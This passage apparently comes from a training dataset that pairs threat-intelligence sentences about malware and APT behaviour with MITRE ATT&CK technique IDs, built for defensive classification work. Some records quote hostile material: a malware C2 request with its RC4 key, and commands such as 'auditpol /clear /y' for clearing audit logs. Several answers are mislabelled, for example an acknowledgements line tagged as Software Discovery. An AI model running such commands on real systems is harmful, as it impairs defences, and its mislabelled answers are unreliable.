T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POST /api/osx/started HTTP/1.1Host: r2elajikcosf7zee.onion.toAccept: */*Content-Length: 233Content-Type: application/x-www-form-urlencodedbot_id=9a8965ba04e72909f36c8d16aa801794c6d905d045c2b704e8f0a9bbb97d3eb8&data=psX0DKYB0u...5TximyY%2BQY%3D Figure 10: Malware sending initial information > rc4decrypt(base64decode(""psX0DKYB0u...5TximyY+QY=""), ""u2RLhh+!LGd9p8!ZtuKcN"")device_model=MacBookPro9,2bot_version=1.3.5build_name=elitef*ckos_version=15.5.0ip_address=4.5.6.7has_root=0 Figure 11: Decoded data sent to C&C The bot_id is constructed by hashing the following values with SHA-256: The hardware UUID (IOPlatformUUID) The system serial number (IOPlatformSerialNumber) The model identifier of the Mac (e.g.: MacBookPro9,2) Most actions are self-explanatory### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The loader component is executed via RUNDLL32.EXE### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can search for anti-virus products on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These services are more likely to have a less-strict security policy than an enterprise.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has downloaded additional tools including PsExec directly to endpoints.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The OopsIE payload checks to see if the result of this query as more than 0 elements to determine if it is running on a virtual machine### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal has used UPX to pack Bandook.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets from remote servers .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A menuPass macro deletes files after it has decoded and decompressed them.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can Base64-encode C2 commands.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn’t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2 SYSCON network traffic witnessed during execution   Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This ID is sent to the CnC with each request for commands to execute### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary can be installed and used to execute malicious JavaScript embedded within local or remote XSL files.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has created scheduled tasks using name variants such as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"", to launch Maze at a specific time.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Services or processes may not allow for modification of their data stores while running.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can collect a variety of information from victim machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the ability to extract credentials from the Registry.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can accept multiple URLs for C2 servers.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack executes the cmd.exe command.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly takes screenshots of the user's desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Section 1 The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables: TEMpPAtH = ""C:\ProgramData\"" (the path used for storing the temp files) Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine) FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code) PRIVAtE = Private Key exponents PUbLIc = Public Key exponents Hklm = ""HKLM:\Software\"" Hkcu = ""HKCU:\Software\"" ValuE = ""kaspersky"" SYSID DrAGon_MidDLe = [array of proxy URLs] Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has the ability to download and execute code from remote servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony can download additional files onto the infected system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands that may obtain information about services using operating system utilities are ""sc,"" ""tasklist /svc"" using Tasklist, and ""net start"" using Net, but adversaries may also use other tools as well.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can achieve persistence through a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can enumerate through all open processes to search for any that have the string “sql” in their process name.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There have been numerous incidents where cloud storage has been improperly secured , allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has modified Managed Object Format files within the Registry to run specific commands and create persistence on the system.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell has the ability to create reverse shells with Perl scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda's PlugX variant has created a hidden folder on USB drives named RECYCLE.BIN to store malicious executables and collected data.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat!### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another Lazarus Group malware sample also performs exfiltration over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variants of Emissary encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the ""srand"" and ""rand"" functions.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has created scheduled tasks to run malicious scripts on a compromised host.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Query Registry and calls to Native API functions.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can check the system language using GetUserDefaultUILanguage and GetSystemDefaultUILanguage.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRITON’s TsLow python module pings controllers over the TriStation protocol.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used process hollowing to inject into child processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files are stored within an 217kb encrypted cab file in the dropper’s resources under the name “A”### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum can steal cookies and session information from browsers.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete captures screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to AES encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage the SharePoint repository as a source to mine valuable information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality .### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework., nltest /domain_trusts ### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Maze encryption process has used batch scripts with various commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can steal profiles from Firefox, Chrome, and Opera.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap uses Python for scripting to execute additional commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has deleted arbitrary Registry values.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has used useless code blocks to counter analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used verclsid.exe to download and execute a malicious script.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create cloud instances in unused geographic service regions in order to evade detection.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has used various batch scripts to establish C2 and download additional files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer exfiltrates collected files via removable media from air-gapped victims.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and Terminate{Extension/Filter}.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to communicate with its C2 over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework., NBNS Spoofing ### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has installed ANTAK and ASPXSPY web shells.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These group policies are stored in SYSVOL on a domain controller.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has delivered payloads via spearphishing attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naid creates a new service to establish.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used mshta.exe to launch collection scripts.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda used custom batch scripts to collect files automatically from a targeted system.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork encrypted the collected files' path with AES and then encoded them with base64.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Third-party security software such as endpoint detection and response tools may not start after booting Windows in safe mode.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae has the capability to upload collected files to C2.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit’s infpub.dat file creates a scheduled task to launch a malicious executable.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's macOS backdoor changes the permission of the file it wants to execute to 755.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about business relationships may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may plant trojan dynamic-link library files in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used various MS-SQL stored procedures.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used Virtual Private Server infrastructure.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can pull a timestamp from the victim's machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the /tmp folder.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT uses a keylogger to capture keystrokes and location of where the user is typing.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used exploits for Flash Player , Word , Internet Explorer , and Microsoft Edge for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Group policy objects are containers for group policy settings made up of files stored within a predicable network path \\SYSVOL\\Policies\.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya contains a modified version of Mimikatz to help gather credentials that are later used for lateral movement.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ELMER uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS installs a registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MS##-### ### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can list file and directory information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer searches victim drives for files matching certain extensions or names.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can execute getinfo to enumerate the computer name and OS version of a compromised system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to File and Directory Discovery on a local host, after identifying available storage services Cloud Infrastructure Discovery adversaries may access the contents/objects stored in cloud infrastructure.### Assistant: T1619: Cloud Storage Object Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher hooks processes by modifying IAT pointers to CreateWindowEx.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL is capable of capturing screenshots of the victim's machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke gathers system configuration information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can encrypt data and leave a ransom note.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky extracts basic information about the operating system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may try to dump Exchange address lists such as global address lists .### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has collected the username from a victim machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has used FTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lurid can compress data before sending it.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes collects the victim's %TEMP% directory path and version of Internet Explorer.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has initiated connections to external domains using HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has created a user named “monerodaemon”.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use Python to perform execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.### Assistant: T1495: Firmware Corruption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap is a kernel-mode rootkit used for cryptocurrency mining.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 named tasks \Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager in order to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may extract credentials from memory via Exploitation for Credential Access.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also uses RSA to encrypt resources.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be used to limit the number of egress points, or provide access to a host without direct internet access.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete’s downloaded data is decrypted using AES.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to remotely trigger keyboard input and mouse clicks.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy has the ability to automatically exfiltrate files and keylogs.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has named malicious files rekeywiz.exe to match the name of a legitimate Windows executable.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When, finally, the first stage shellcode receives a special “FF” signal, it then executes the delivered shellcode### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used PowerShell loaders as part of execution.### Assistant: T1059: Command and Scripting Interpreter" "### 